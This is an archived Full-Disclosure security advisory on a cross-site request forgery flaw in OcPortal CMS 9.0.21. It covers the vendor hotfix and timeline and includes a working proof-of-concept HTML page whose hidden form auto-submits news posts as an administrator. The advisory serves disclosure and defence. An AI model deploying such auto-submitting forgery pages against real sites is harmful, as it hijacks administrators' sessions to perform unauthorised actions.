| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 12 Dec 2015 20:23:55 +0530
From: CSW Research Lab <disclose@...ersecurityworks.com>
To: fulldisclosure@...lists.org
Subject: [FD] OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability
================================================================
OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability
================================================================
Information
**********************
Vulnerability Type : Cross-site Request Forgery (CSRF) Vulnerability
Vulnerable Version : 9.0.21
Severity: High
Author – Arjun Basnet
CVE-ID: N/A
Homepage: https://ocportal.com/site/sites.htm/
Description
***********************
OcPortal CMS is prone to CSRF vulnerability bypasses referrer checks for
checking forms posted to the system. It allows an attacker to trick
administrators into submitting coded forms (i.e. coded actions) into the
system which means an attacker can add an admin user and thus gain code
execution
Proof of Concept
***************************
<!DOCTYPE>
<html lang="en">
<head>
<title>OcPortal 9.0.21 CSRF Vulnerability POC</title>
</head>
<body>
<form action="
http://localhost/ocportal/cms/index.php?page=cms_news&type=_ad&uploading=1"
enctype="multipart/form-data" method="post" id="formid">
<input type="hidden" name="MAX_FILE_SIZE" value="16777216" />
<input type="hidden" name="file1" value="" />
<input type="hidden" name="tick_on_form__validated" value="0" />
<input type="hidden" name="label_for__allow_rating" value="Allow rating" />
<input type="hidden" name="f_face" value="/" />
<input type="hidden" name="require__author" value="1" />
<input type="hidden" name="label_for__title" value="Title" />
<input type="hidden" name="file" value="" />
<input type="hidden" name="label_for__meta_description" value="Concise
description" />
<input type="hidden" name="require__meta_description" value="0" />
<input type="hidden" name="validated" value="1" />
<input type="hidden" name="label_for__meta_keywords[]1" value="Keywords" />
<input type="hidden" name="label_for__meta_keywords[]0" value="Keywords" />
<input type="hidden" name="meta_description" value="Attack_OcPortal" />
<input type="hidden" name="allow_comments" value="1" />
<input type="hidden" name="comcode__news" value="1" />
<input type="hidden" name="http_referer" value="
http://localhost/ocportal/cms/index.php?page=cms_news&type=ad" />
<input type="hidden" name="author" value="Attack_OcPortal" />
<input type="hidden" name="pre_f_notes" value="1" />
<input type="hidden" name="post__is_wysiwyg" value="1" />
<input type="hidden" name="label_for__file" value="Image" />
<input type="hidden" name="comcode__title" value="1" />
<input type="hidden" name="require__news_category" value="0" />
<input type="hidden" name="allow_rating" value="1" />
<input type="hidden" name="tick_on_form__allow_rating" value="0" />
<input type="hidden" name="require__allow_comments" value="0" />
<input type="hidden" name="label_for__validated" value="Validated" />
<input type="hidden" name="label_for__notes" value="Notes" />
<input type="hidden" name="label_for__post" value="News article" />
<input type="hidden" name="meta_keywords[]" value="Attack_OcPortal" />
<input type="hidden" name="label_for__main_news_category" value="Main
category" />
<input type="hidden" name="f_size" value="" />
<input type="hidden" name="require__allow_rating" value="0" />
<input type="hidden" name="label_for__author" value="Source" />
<input type="hidden" name="require__title" value="1" />
<input type="hidden" name="comcode__post" value="1" />
<input type="hidden" name="news" value="Attack_OcPortal" />
<input type="hidden" name="post" value="Attack_OcPortal" />
<input type="hidden" name="require__validated" value="0" />
<input type="hidden" name="news__is_wysiwyg" value="1" />
<input type="hidden" name="require__notes" value="0" />
<input type="hidden" name="label_for__allow_comments" value="Allow
comments" />
<input type="hidden" name="posting_ref_id" value="13973" />
<input type="hidden" name="f_colour" value="" />
<input type="hidden" name="label_for__news" value="News summary" />
<input type="hidden" name="require__meta_keywords" value="0" />
<input type="hidden" name="notes" value="Attack_OcPortal" />
<input type="hidden" name="title" value="Attack_OcPortal" />
<input type="hidden" name="require__file" value="0" />
<input type="hidden" name="require__main_news_category" value="1" />
<input type="hidden" name="label_for__news_category" value="Secondary
categories" />
<input type="hidden" name="main_news_category" value="7" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
Severity Level:
===============
High
Vulnerable Product:
===================
[+] OcPortal CMS 9.0.21
Advisory Timeline
************************
12-Nov-2015- Reported
12-Nov-2015- Vendor released hotfix
12-Dec-2015- Public disclosed
Fixed Version:
*****************
Vendor has released the hotfix for this issue please refer below link:
[+]
http://ocportal.com/site/news/view/chris_grahams_blog/security-fix-for-csrf.htm
Reference
*****************
[+] http://ocportal.com/tracker/view.php?id=2074
[+] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Credits & Authors
**********************
Arjun Basnet from Cyber Security Works Pvt. Ltd. (
http://cybersecurityworks.com)
--
----------
Cheers !!!
Team CSW Research Lab <http://www.cybersecurityworks.com>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists